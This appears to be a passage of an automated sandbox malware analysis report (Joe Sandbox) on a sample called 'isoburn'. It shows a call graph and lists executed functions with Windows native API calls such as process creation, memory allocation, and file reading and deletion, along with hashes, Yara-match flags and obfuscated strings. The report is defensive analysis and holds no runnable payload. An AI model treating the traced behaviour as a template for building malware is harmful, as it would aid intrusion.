98616 70dae0 98613->98616 98615 709ff3 98615->98600 98617 70db04 98616->98617 98618 70dbae 98617->98618 98619 71b480 RtlFreeHeap 98617->98619 98618->98615 98619->98618 98620 7021c0 98621 718a00 LdrInitializeThunk 98620->98621 98622 7021f6 98621->98622 98625 719440 98622->98625 98624 70220b 98626 7194cf 98625->98626 98627 71946b 98625->98627 98630 48f2e80 LdrInitializeThunk 98626->98630 98627->98624 98628 719500 98628->98624 98630->98628 98631 719300 98632 719377 98631->98632 98634 71932b 98631->98634 98633 71938d NtDeleteFile 98632->98633 98640 71c580 98641 71b480 RtlFreeHeap 98640->98641 98642 71c595 98641->98642 98643 708704 98645 708714 98643->98645 98644 7086c1 98645->98644 98647 706fb0 98645->98647 98648 706fff 98647->98648 98649 706fc6 98647->98649 98648->98644 98649->98648 98651 706e20 LdrLoadDll 98649->98651 98651->98648 98652 702688 98653 70269f 98652->98653 98654 7061c0 2 API calls 98653->98654 98655 7026b3 98654->98655 98656 707289 98657 70728e 98656->98657 98658 707232 98656->98658 98659 70727f 98658->98659 98661 70b170 98658->98661 98662 70b196 98661->98662 98663 70b3c6 98662->98663 98688 7197b0 98662->98688 98663->98659 98665 70b20c 98665->98663 98666 71c650 2 API calls 98665->98666 98667 70b22b 98666->98667 98667->98663 98668 70b2ff 98667->98668 98669 718a00 LdrInitializeThunk 98667->98669 98670 705a30 LdrInitializeThunk 98668->98670 98672 70b31e 98668->98672 98671 70b28a 98669->98671 98670->98672 98671->98668 98675 70b293 98671->98675 98677 70b3ae 98672->98677 98694 718570 98672->98694 98673 70b2e7 98674 707fe0 LdrInitializeThunk 98673->98674 98678 70b2f5 98674->98678 98675->98663 98675->98673 98676 70b2c5 98675->98676 98691 705a30 98675->98691 98709 714690 LdrInitializeThunk 98676->98709 98679 707fe0 LdrInitializeThunk 98677->98679 98678->98659 98683 70b3bc 98679->98683 98683->98659 98684 70b385 98699 718620 98684->98699 98686 70b39f 98704 718780 98686->98704 98689 7197cd 98688->98689 98690 7197de CreateProcessInternalW 98689->98690 98690->98665 98692 718bd0 LdrInitializeThunk 98691->98692 98693 705a6e 98692->98693 98693->98676 98695 7185f0 98694->98695 98697 71859e 98694->98697 98710 48f39b0 LdrInitializeThunk 98695->98710 98696 718615 98696->98684 98697->98684 98700 7186a0 98699->98700 98702 71864e 98699->98702 98711 48f4340 LdrInitializeThunk 98700->98711 98701 7186c5 98701->98686 98702->98686 98705 7187ab 98704->98705 98706 7187fd 98704->98706 98705->98677 98712 48f2fb0 LdrInitializeThunk 98706->98712 98707 718822 98707->98677 98709->98673 98710->98696 98711->98701 98712->98707

                                                            Executed Functions

                                                            Function 006F9E40 Relevance: 26.6, Strings: 21, Instructions: 384COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 118 6f9e40-6fa152 119 6fa15c-6fa163 118->119 120 6fa19e 119->120 121 6fa165-6fa19c 119->121 122 6fa1a5-6fa1af 120->122 121->119 123 6fa1e7-6fa1f0 122->123 124 6fa1b1-6fa1cb 122->124 127 6fa206-6fa210 123->127 128 6fa1f2-6fa204 123->128 125 6fa1cd-6fa1d1 124->125 126 6fa1d2-6fa1d4 124->126 125->126 129 6fa1d6-6fa1df 126->129 130 6fa1e5 126->130 131 6fa221-6fa22d 127->131 128->123 129->130 130->122 132 6fa22f-6fa23b 131->132 133 6fa23d-6fa241 131->133 132->131 134 6fa25c-6fa274 133->134 135 6fa243-6fa25a 133->135 137 6fa285-6fa291 134->137 135->133 138 6fa2a8-6fa2b2 137->138 139 6fa293-6fa2a6 137->139 140 6fa2c3-6fa2cf 138->140 139->137 142 6fa2e5-6fa2ee 140->142 143 6fa2d1-6fa2e3 140->143 144 6fa2f4-6fa2f7 142->144 145 6fa510-6fa517 142->145 143->140 149 6fa2fd-6fa304 144->149 147 6fa54a-6fa551 145->147 148 6fa519-6fa548 145->148 150 6fa5c3-6fa5cd 147->150 151 6fa553-6fa55d 147->151 148->145 152 6fa32b-6fa335 149->152 153 6fa306-6fa329 149->153 156 6fa5de-6fa5e7 150->156 154 6fa56e-6fa57a 151->154 155 6fa346-6fa352 152->155 153->149 159 6fa58d call 71b0e0 154->159 160 6fa57c-6fa58b 154->160 161 6fa365-6fa36c 155->161 162 6fa354-6fa363 155->162 157 6fa5fe-6fa607 156->157 158 6fa5e9-6fa5fc 156->158 158->156 170 6fa592-6fa59e 159->170 167 6fa55f-6fa568 160->167 164 6fa36e-6fa391 161->164 165 6fa393-6fa39d 161->165 162->155 164->161 169 6fa3ae-6fa3ba 165->169 167->154 171 6fa3bc-6fa3c9 169->171 172 6fa3cb-6fa3da 169->172 170->150 173 6fa5a0-6fa5c1 170->173 171->169 174 6fa40d-6fa417 172->174 175 6fa3dc-6fa3e3 172->175 173->170 179 6fa428-6fa434 174->179 177 6fa408 175->177 178 6fa3e5-6fa3fb 175->178 177->145 180 6fa3fd-6fa403 178->180 181 6fa406 178->181 182 6fa44a-6fa454 179->182 183 6fa436-6fa448 179->183 180->181 181->175 184 6fa465-6fa471 182->184 183->179 186 6fa493-6fa499 184->186 187 6fa473-6fa480 184->187 190 6fa49d-6fa4a4 186->190 188 6fa482-6fa48b 187->188 189 6fa491 187->189 188->189 189->184 192 6fa4c9-6fa4d3 190->192 193 6fa4a6-6fa4bc 190->193 196 6fa4e4-6fa4ed 192->196 194 6fa4be-6fa4c4 193->194 195 6fa4c7 193->195 194->195 195->190 197 6fa4ef-6fa4fb 196->197 198 6fa50b 196->198 199 6fa4fd-6fa503 197->199 200 6fa509 197->200 198->142 199->200 200->196
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ")$#$#$$u$'$-$-~$.$@k$H$O($T$Z/$[5$]5$f?$pa$r$vj$}$K
                                                            • API String ID: 0-3922967351
                                                            • Opcode ID: caf37acd659b303d8658ef6739fe705919f6c318ef4444487542019a5517ea90
                                                            • Instruction ID: 7885fe15e6da677c77cd9e7e1ad8eb52a6c58cc6f6774a086a1a441ab83e0bed
                                                            • Opcode Fuzzy Hash: caf37acd659b303d8658ef6739fe705919f6c318ef4444487542019a5517ea90
                                                            • Instruction Fuzzy Hash: B7228EB0D0522DCBEB24CF85C994BEDBBB2BB44308F2081D9C10D6B285D7B56A89DF55
                                                            Function 0070C4E0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0070C5C4
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0070C5FF
                                                            • FindClose.KERNELBASE(?), ref: 0070C60A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                            • Instruction ID: db3d37a724fe4ddce1f7425545e96891d6be8ad32b19036de2c33be27e2df3d0
                                                            • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                            • Instruction Fuzzy Hash: 153185B5500248FBEB21DBA4CC85FFB77BC9B44744F144658F908A61C0DB74AA848BA0
                                                            Function 007190A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 007191A1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction ID: a68568e05d69966cb283d8591c127299c498650e1833db4408683d33e9c3247c
                                                            • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction Fuzzy Hash: 1131E5B5A01608ABDB54DF98D841EEFB7F9AF8C310F104619F918A7341D734A941CBA4
                                                            Function 00719210 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 007192F6
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction ID: 21c1873ce88cdfde780465e41bce87c71d5a6b76912835151f70bc65db29647c
                                                            • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction Fuzzy Hash: 303102B5A00208AFDB14DF98D881EEFB7F9AF8C314F108219F918A7341D774A951CBA4
                                                            Function 00719510 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00701CAE,9ACB2CF8,00717EAF,00000000,00000004,00003000,?,?,?,?,?,00717EAF,00701CAE), ref: 007195DB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                            • Instruction ID: 04b7f447984f512ad2659b360564e21e1dd094e50ff64f5fb665fec917e2a82f
                                                            • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                            • Instruction Fuzzy Hash: F72168B5A00209AFDB10DF98DC41EEFB7B9EF88300F104219F918A7281DB75A911CBA5
                                                            Function 00719300 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                            • Instruction ID: 309e34a790e69452b1220f94b8e2dd1194f20176b6c3a6bbc02404eeb68c1cee
                                                            • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                            • Instruction Fuzzy Hash: 92119171601604BAD760EB68DC02FFBB3ACEF85710F10461DFA1867282DB75B94687A5
                                                            Function 007193A0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 007193D4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction ID: 08ca12341e6d611dea39033244a396cd30f956b4e9248d35d44891f4962e1714
                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction Fuzzy Hash: A7E08636200204BBD210EB69DC45FD777ADDFC5750F004119FA0C67242C671791087F5
                                                            Function 048F4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9229c315c8146584895f75e9543abf0b6fdb405ba03c7afa8224e898cddb02e8
                                                            • Instruction ID: 87e065df6b62c999a3221b88ead1495048d9e85841a3f2c826f2188eeb099573
                                                            • Opcode Fuzzy Hash: 9229c315c8146584895f75e9543abf0b6fdb405ba03c7afa8224e898cddb02e8
                                                            • Instruction Fuzzy Hash: AB900261701A00866140B158480840660499BE1305395C125A05555A4C8618D9559269
                                                            Function 048F4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0492b3d66f05f424e022650beed04d4c1f7c6df18d7c4d87f381ac7fa0983c9b
                                                            • Instruction ID: 0a44bac72547551d5b83ceedede06abbbe0c23508b17680b78c41142dd22e445
                                                            • Opcode Fuzzy Hash: 0492b3d66f05f424e022650beed04d4c1f7c6df18d7c4d87f381ac7fa0983c9b
                                                            • Instruction Fuzzy Hash: 32900231705D0056B140B158488854640499BE0305B55C021E0425598C8A14DA565361
                                                            Function 048F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 2a5d31e0a4c77499194f26803fe833ad51bd13ac3187bc7d17f8e8a5e995b678
                                                            • Instruction ID: ae66b592b8ebbacc1f3be1e08c16d76a4312a9f1dc224916ef413cba2e5f68d9
                                                            • Opcode Fuzzy Hash: 2a5d31e0a4c77499194f26803fe833ad51bd13ac3187bc7d17f8e8a5e995b678
                                                            • Instruction Fuzzy Hash: CB90023130190446F100B598540C64600498BE0305F55D021A5025599EC665D9916131
                                                            Function 048F2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: eb4ed534c006033ac2117c4091b2fbbb69373b19b69abbe73e1d6bd7d4a4908c
                                                            • Instruction ID: 7d7bed2425a29712778572a71e7172a230ed6a887581ad40dfa4eb5b1b1914a5
                                                            • Opcode Fuzzy Hash: eb4ed534c006033ac2117c4091b2fbbb69373b19b69abbe73e1d6bd7d4a4908c
                                                            • Instruction Fuzzy Hash: F590023130190886F100B1584408B4600498BE0305F55C026A0125698D8615D9517521
                                                            Function 048F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 18e2e2c7169d63df3a292ca96721c33d8da6a25c97071557846d69754aabef91
                                                            • Instruction ID: 2ae3ea0300523f5c16733598119cd3400e9248464636779f95ff5781b87c515b
                                                            • Opcode Fuzzy Hash: 18e2e2c7169d63df3a292ca96721c33d8da6a25c97071557846d69754aabef91
                                                            • Instruction Fuzzy Hash: D090023130198846F110B158840874A00498BD0305F59C421A442569CD8695D9917121
                                                            Function 048F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: eea05e5085d66ac8cd0196eb58b29611daa5ce024c8954e034b47b7ed67de45d
                                                            • Instruction ID: 101f575295f3752827056e6641309e5d8ea45c08385346d1e1b5c5f17c4062ef
                                                            • Opcode Fuzzy Hash: eea05e5085d66ac8cd0196eb58b29611daa5ce024c8954e034b47b7ed67de45d
                                                            • Instruction Fuzzy Hash: FC900221342941967545F1584408507404A9BE0345795C022A1415994C8526E956D621
                                                            Function 048F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6b08caaaaad0281ec19cef8e924bf011fd9a7d8d973619b71ea5bd2ebb335c32
                                                            • Instruction ID: 15ddd011931705f750b0abd1a92cc4e72c91a9c1677c6800b817e9407a68e72a
                                                            • Opcode Fuzzy Hash: 6b08caaaaad0281ec19cef8e924bf011fd9a7d8d973619b71ea5bd2ebb335c32
                                                            • Instruction Fuzzy Hash: 9390023130190457F111B1584508707004D8BD0345F95C422A042559CD9656DA52A121
                                                            Function 048F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: cf4f81f7004c849ed4c780b11236c0af7a4728d4a47d30a6d460b77f67d025f6
                                                            • Instruction ID: 0fced49497dbb645a3573ec875bdb382f52dbf499db0178f8edf05fdc7872852
                                                            • Opcode Fuzzy Hash: cf4f81f7004c849ed4c780b11236c0af7a4728d4a47d30a6d460b77f67d025f6
                                                            • Instruction Fuzzy Hash: 4990022931390046F180B158540C60A00498BD1306F95D425A001659CCC915D9695321
                                                            Function 048F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f39aeb5e3dbd4e1724ccbccf6fff51bc6c83918fea9c40d84deeac183f773a4e
                                                            • Instruction ID: f6eb7efd78bcc10946da1650ba4c757273ec31b269d6bdb24b1416646c849d36
                                                            • Opcode Fuzzy Hash: f39aeb5e3dbd4e1724ccbccf6fff51bc6c83918fea9c40d84deeac183f773a4e
                                                            • Instruction Fuzzy Hash: 9E90022130190047F140B158541C6064049DBE1305F55D021E0415598CD915D9565222
                                                            Function 048F2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ca2156f668269b868c7d755c76b53080f92d559f6e0fe6d2549053db1116024f
                                                            • Instruction ID: 1ef41a309392db39a7d43addcad342e4c95f4d645dfeb18e6deee8888858d178
                                                            • Opcode Fuzzy Hash: ca2156f668269b868c7d755c76b53080f92d559f6e0fe6d2549053db1116024f
                                                            • Instruction Fuzzy Hash: A690022170190546F101B1584408616004E8BD0345F95C032A1025599ECA25DA92A131
                                                            Function 048F2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 705861f49edf7d051e1cf451396b40acdae03967fe3330aac4af62bf371f822f
                                                            • Instruction ID: 5bfab570a393988003442a2c289f5293a3e0ff9e7b624f8a52d72b79c292b02e
                                                            • Opcode Fuzzy Hash: 705861f49edf7d051e1cf451396b40acdae03967fe3330aac4af62bf371f822f
                                                            • Instruction Fuzzy Hash: 27900261301D0447F140B558480860700498BD0306F55C021A2065599E8A29DD516135
                                                            Function 048F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8f6c53d0b8ea5c2f782cdf91d11d618a2305b882ce24bb9b82f1f9094c2b1768
                                                            • Instruction ID: 2cb97a215f8eb434174c32e99a55642bae19ac33b226aa24183c8057a990701a
                                                            • Opcode Fuzzy Hash: 8f6c53d0b8ea5c2f782cdf91d11d618a2305b882ce24bb9b82f1f9094c2b1768
                                                            • Instruction Fuzzy Hash: 8B900221701900866140B16888489064049AFE1315755C131A0999594D8559D9655665
                                                            Function 048F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
